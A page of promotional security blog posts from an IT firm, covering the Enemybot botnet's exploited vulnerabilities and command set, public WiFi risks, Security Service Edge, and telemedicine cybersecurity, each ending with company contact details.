Category: Cybersecurity Page 1 of 2
Enemybot is a new botnet that is conducting DDoS (Distributed Denial of Service) assaults on several routers and websites. It is attacking various routers and websites by leveraging existing vulnerabilities in ARM, BSD, x64, x86, and other architectures. Enemybot was identified by FortiGuard labs in mid-March.
This botnet is mostly based on the source code of Gafgyt, however it has been reported to borrow various modules from Mirai’s original source code. To avoid detection, the Enemybot employs a number of obfuscation techniques and hides Command and control (C2) server on the TOR network. The Enemybot botnet spreads and assaults other IoT devices through a variety of tactics. It attempts to gain access to systems using weak or default credentials by logging into devices with a list of hardcoded username/password combinations. By running shell commands, the bot also attempts to infect misconfigured Android devices that expose the Android Debug Bridge port (5555). Enemybot has been observed infecting Seowon Intech and D-Link routers as well as abusing a previously disclosed iRZ router vulnerability.
The bot leverages a number of known and previously disclosed loopholes, which include: –
- SEOWON INTECH SLC-130 and SLR-120S routers are vulnerable to CVE-2020-17456.
- Earlier D-Link routers were vulnerable to CVE-2018-10823.
- CVE-2022-27226 affects iRZ mobile routers.
- CVE-2022-25075 to 25084 affects TOTOLINK routers, which were formerly used by the Beastmode botnet.
- CVE-2021-41773/CVE-2021-42013 is a vulnerability that affects Apache HTTP servers.
- CVE-2018-20062: This vulnerability affects the ThinkPHP CMS.
- CVE-2017-18368 is a vulnerability that affects Zyxel P660HN routers.
- CVE-2016-6277 is a vulnerability that affects NETGEAR routers.
- CVE-2015-2051 is a vulnerability that affects D-Link routers.
- CVE-2014-9118 is a vulnerability that affects Zhone routers.
Once one of the foregoing problems has been exploited, the bot will use the shell command LDSERVER to download a shell script from a URL that the C2 server will dynamically update. The script then downloads the real Enemybot binary, which is adapted to the target device’s architecture. If the download server goes down, the botnet managers can update the bot clients with a new URL. The bot connects to its C2 server after being placed on a device and waits for new orders.
Enemybot connects to the C2 server and waits for orders to be executed when a device is infected. Although the majority of the instructions are connected to DDoS assaults, the virus is not just focused on them. Fortinet presents the following set of supported commands: –
- ADNS: Perform a DNS amplification attack with ADNS.
- ARK: Stealth survival while launching an attack on the game’s servers.
- BLACKNURSE — Flood the target with ICMP packets indicating that the destination port is unreachable.
- DNS – Inundate DNS servers with DNS UDP requests that have been hardcoded.
- HOLD – Flood the target with TCP connections and keep them alive for a certain amount of time.
- HTTP — Send a flood of HTTP requests to the destination.
- JUNK — Flood the destination with non-zero-byte UDP packets at random intervals.
- OVH – Send custom UDP packets to OVH servers.
- STD — Send a flood of random-byte UDP packets to the destination.
- TCP — Send a flood of TCP packets to the target with forged source headers.
- TLS — Carry out an SSL/TLS attack.
- UDP — Send UDP packets with forged source headers to the destination.
- OVERTCP — Use randomized packet delivery intervals to launch a TCP assault.
- STOP — Put an end to continuous DoS assaults.
- LDSERVER – Update the exploit payload download server.
- SCANNER — SSH/Telnet brute-force attacks and vulnerabilities spread to additional devices.
- TCPOFF/TCPON — Turn the sniffer off or on at ports 80, 21, 25, 666, 1337, and 8080, potentially to gather credentials.
Preventing Botnet Attacks
Always apply the latest available software and firmware updates for your product to prevent Enemybot or any other botnet from infecting your devices and recruiting them to malicious DDoS botnets.
One of the most common signs that your router may be infected with a botnet malware infection is that the router may become non-responsive, internet speeds drop, and the router becomes hotter than usual. In such a scenario, you should restart the router and change the passwords. It is also advised to take services of specialized cyber-security professionals to find and weed out the problem.
Centex Technologies provide state-of-the-art cybersecurity and network security solutions for businesses. To know more, contact Centex Technologies at Killeen (254) 213-4740, Dallas (972) 375-9654, Atlanta (404) 994-5074, and Austin (512) 956-5454.
Free Wi-Fi access sites found at restaurants, airports, cafes, hotels, bookstores, and even odd retail outlets are usually frequented by people to use their devices or to connect with internet. However, this liberty comes with a cost, and few people are aware of the dangers of using public WiFi. Learning how to defend against the risks that come with utilizing such sites can go a long way toward keeping data on devices safe and secure.
Security Challenges of using a Public WiFi
The lack of authentication required to establish a network connection makes free WiFi hotspots desirable to users and particularly enticing to hackers. This gives the hackers a fantastic opportunity to acquire full access to unsecured devices on the same network. Instead of communicating directly with the hotspot, you may end up providing your information to the hacker, who may then pass it on.
While working in a free Wi-Fi arrangement, the hacker may have access to every piece of information you send out on the Internet. While using free Wi-Fi, sensitive information such as emails, credit cards, and even security passwords might be exposed. An unencrypted WiFi connection can also be used by hackers to propagate malware. A hacker can swiftly infect a machine with contaminated software if users share data across a network.
Some of the infamous security challenges users face using a Public WiFi: –
- Compromised Personal Information such as Login credentials, Financial information, Personal data, Pictures, etc.
- Advanced cyber-attacks on individuals’ devices, businesses, automobiles, smart gadgets, etc.
- MitM (Man-In-The-Middle) attacks to breach the privacy of communication.
- Network connections using weak or no secure encryption mechanisms.
- Sniffing and intercepting the network packets i.e. the communication channels breaching confidentiality.
- Distributing and injecting malware into devices and network systems.
- Hijacking the devices and networks using Public WiFi to connect to the internet.
How to prevent or reduce the damage arising from using Public WiFi
A. Transport-level SSL Security
Even if users do not have access to a VPN application for daily Internet browsing, they can still secure their communications. For those websites, being visited regularly or that need one to input credentials, “Always Use HTTPS” option should be selected. Hackers are aware of how people reuse passwords and thus a user’s login and password for some random forum might be the same as the bank or workplace network, which they may exploit.
B. Keep the Public Sharing option Off
Users are advised not to disclose anything when using the Internet in a public area. They can deactivate sharing on WiFi using the system settings the first time they join an unprotected network.
C. Connecting to the Internet using VPNs
When connecting to a business network through an insecure network, such as a WiFi hotspot, a VPN (Virtual Private Network) connection is essential. Even if a hacker manages to get in the middle of the encrypted connection, the data is heavily secured. Because most hackers are looking for a quick buck, they are more likely to throw away encrypted stolen data rather than decode it.
D. Turn Off the WiFi when not in need
Even if users are not connected to a network, WiFi technology still communicates between any networks within their range. There are security mechanisms in place to keep this tiny communication from compromising the users’ devices. It is strongly advised to keep the WiFi turned off if users are only working on a Word or Excel document or any offline application on their devices.
E. Follow the security guidelines provided by the Security Vendors
Even those who take all feasible measures when using public WiFi can occasionally encounter problems. Hence, it is critical to have a good Internet security program installed on the devices. These programs can scan files for malware regularly. They can also scan new files as and when they are downloaded. The best consumer security software often includes business protection features, allowing users to safeguard themselves while simultaneously protecting their servers at work.
There will come a point in every business traveler’s life when the only connection available is an insecure, free public WiFi hotspot. Being equipped with the right security solutions will help the user avoid being a victim of a cybercrime.
Centex Technologies provide state-of-the-art cybersecurity and internet security solutions to businesses. To know more, contact Centex Technologies at Killeen (254) 213-4740, Dallas (972) 375-9654, Atlanta (404) 994-5074, and Austin (512) 956-5454.
SSE (Security Service Edge) improves the security strategy posture of any organization leveraging cloud services. It secures access to the enterprise internet and various cloud services that employees use in their daily operations. It is a crucial tool in strengthening cloud and networking security capabilities. SSE is often offered in a cloud-based service model. However, nowadays it is also available on a hybrid on-premises or agent-based solution model. A few cloud-based components of SSE include access control and threat prevention solutions. These tools ensure data and application security.
How does SSE differentiate from SASE?
SASE (Secure Access Service Edge) combines the networking and security technologies that enable secure and quick enterprise operations on the cloud. SSE is a very important SASE component that combines all security essential services. These may include ZTNA (Zero Trust Network Access) and CASB (Cloud Access Security Broker) to ensure providing SWG (Secure Online Gateway) for enterprise networking assets. The networking component of the SASE framework is the WAN Edge Infrastructure. This focuses on establishing network connections through modifying network infrastructures in real-time. A few of the SSE security services are: –
- CASB (Cloud Access Security Broker) – CASB helps businesses connect over to their sensitive assets on the cloud in a secure manner. It addresses the loopholes in data visibility, securing the data, and complying with the regulatory standards. CASB uses the UEBA (User and Entity Behavior and Analytics) to discover the risks and threats affecting the enterprise cloud instances.
- SWG (Secure Online Gateway) – It is a checkpoint that prevents illegal traffic from intruding on an organization’s network. It links the user and the website to provide end-to-end security. URL filtering and harmful content inspection are just a few of its benefits. An SWG enables users to visit safe and pre-approved websites that protect them from online-based cyber risks.
- ZTNA (Zero Trust Network Access) – Zero Trust is applied in a granular, adaptive, as well as context-aware manner. It secures the private applications installed across multiple clouds and corporate data centers. It strengthens the security perimeter by providing dynamic and policy-based digital transformation.
- DLP – Data Loss Prevention (DLP) tools implement data protection and inadvertent leakage rules in real-time. This limits the inadvertent access flow of sensitive information outside the organization.
- RBI – Remote Browser Isolation (RBI) is a robust web threat prevention system that isolates web browsing activities. It defends users from all kinds of malicious code that might be buried in a website. This prevents any malicious code from ever touching the end user’s devices.
- FWaaS – Firewall-as-a-Service is available on a cloud platform that protects data and applications via the internet. SSE uses it to collate, inspect and analyze traffic from on-prem and off-prem data centers. This provides an entire network of visibility and management. It also ensures uniform policy enforcement across the entire cloud infra.
SSE resolves the security problems posed by remote work, digitization, and cloud transition. SSE assists enterprises in the following ways:
- Security control management & administration simplification – Cloud and on-premises infrastructure must be managed using a patchwork of varied and separate security policies. These policies might be different across the various cloud service providers and on- premises tech stacks. SSE reduces the cost and complexity by facilitating the implementation of policies across on- premises, on-cloud, as well as remote work environments.
- VPNs to facilitate remote work – Remote employees have to use business-sensitive apps in extremely sensitive circumstances. The ZTNA feature from SSE allows for granular resource access. This allows an additional configuration that ensures specific degrees of access for each user.
- Malware threat prevention, detection, and mitigation – Many contemporary attacks utilize social engineering tactics to target a cloud provider’s capabilities. This involves imitating user behavior with authentic credentials. SSE’s SWG acts as a cyber-barrier that monitors traffic on the web as well as blocks any illegal access.
- SaaS apps access control – Security teams require entire visibility as well as control over the sensitive data stored on the cloud platforms. This includes preventing emerging threats on cloud-native attack surfaces. SSE’s CASB enables multi-mode support. This can be ensured by implementing granular regulations to monitor and limit access to authorized and unauthorized cloud services.
Organizations require secure usage, sharing, and access to data that sits outside of the perimeter security. SSE is here to provide functionalities to offer a consolidated and unified approach to data security, endpoint security, cloud security, web and application security, and likewise.
Centex Technologies provide cyber-security and IT security solutions for enterprises. For more information, contact Centex Technologies at Killeen (254) 213-4740, Dallas (972) 375-9654, Atlanta (404) 994-5074, and Austin (512) 956-5454
Telemedicine is the way of the future in medicine. Before the current epidemic, telehealth had already absorbed a significant share of the medical industry’s growth potential. Telehealth utilization surged from 11 percent to 46 percent after COVID, according to McKinsey forecasts, with providers seeing up to 175 times as many patients as before. With 76 percent of consumers expressing interest in telehealth, the future seems bright. Overall, McKinsey estimates that the telemedicine business has a $250-billion-dollar development potential. However, all of this expansion comes with significant hazards.
Telehealth and telemedicine businesses are the waves of the future in the healthcare industry. They are, nevertheless, in the vanguard of our COVID-accelerated future. Cybercrime targeting telemedicine has increased dramatically. Medical data breaches are increasing.
Why hackers are attracted to hack into telemedicine systems?
Telehealth and telemedicine are some of the world’s most profitable industries because of their magnitude. However, because of the large number of stakeholders, including clients and employees, it is a prime target. This industry also holds one of the most prized loot for cybercriminals: PHI of patients.
The following are a few examples of PHI (Personal Health Information): –
- PII (Personally Identifiable Information) about the demographics of patients
- Patients’ medical histories, as well as the results of their various medical tests
- Information about a patient’s medical and life insurance
- Financial details of patients and their mode of payment used to pay the hospital bills
Techniques implemented by hackers to obtain PHI
In addition to the PHI-based dangers inherent to the medical industry, telehealth operators face the same basic vulnerabilities as all businesses. While not all telemedicine cybersecurity vulnerabilities are related to PHI, they are by far the most serious threats. To steal PHI from telehealth providers, cybercriminals use a number of vulnerabilities and employ a complicated set of strategies.
Most of the hospitals have not strengthened the security of their cyberinfrastructure. Loopholes in any company’s cyberdefense create opportunities for hackers to take control of assets and cause havoc.
Inadequate firewalls cannot block incoming viruses and malware. Hence, hackers utilize insecure networks to gain access to various corporate systems and devices. Hackers can get around password protection thanks to flaws in authentication mechanisms. Once they infiltrate, the unencrypted data stored in servers are easier to steal and mobilize.
Medical professionals often lack end-user security awareness essential to defend against malicious social engineering tactics adopted by cybercriminals. Even the most well-protected cyberdefense system must accommodate for human mistakes across several employees and clientele accounts. Users who haven’t been properly instructed may configure passwords and settings that are not secure. Users may also be duped into compromising their own accounts through social engineering. Hackers may get access to physical areas and take advantage of unsupervised endpoints.
Targeting the mission-critical hospital network infrastructure with DoS and DDoS attacks is again a very common and brutal technique. DDoS (Distributed Denial of Service) attacks usually target servers, ultrasound machines, ventilators, and pacemakers. Cybercriminals bombard a continuous stream of access requests to the hospital network. This overwhelms the server systems and disrupts the usual network operations. The daily mission-critical operations are slowed or perhaps stopped as a result of this hyper network traffic. Hackers also take advantage of newly discovered flaws, often dubbed as Zero-Day vulnerabilities. Alternatively, hackers may demand a ransom before restoring normal service. Combinations of attacks, using numerous vulnerabilities at once, are being used by the most dedicated and notorious hackers.
HIPAA (Health Insurance Portability and Accountability Act)
The HIPAA (Health Insurance Portability and Accountability Act) of 1996 was created to ensure that PHI and the medical and health-related profession as a whole had uniform security requirements. It is administered and monitored by the US Department of Health and Human Services (HHS). The hazards created by cybercrime cannot be totally eliminated by adhering to the specific regulations and measures that each rule requires. However, compliance is a set of procedures that minimizes vulnerabilities and mitigates hazards in the telemedicine and healthcare industries. It’s not easy to comply with HIPAA. It is advised to hire professional services. The professional cybersecurity company will aid the business to evaluate their information security posture. They also help in deploying the precautions as well as handling the patchwork to ensure that all loopholes are closed or at least monitored. This is one of the best approaches to ensure the safety and security of your telemedicine systems and data.
Centex Technologies provide complete IT infrastructure and Cybersecurity solutions for businesses including medical establishments. For more information on how you can protect your systems, contact Centex Technologies at Killeen (254) 213-4740, Dallas (972) 375-9654, Atlanta (404) 994-5074, and Austin (512) 956-5454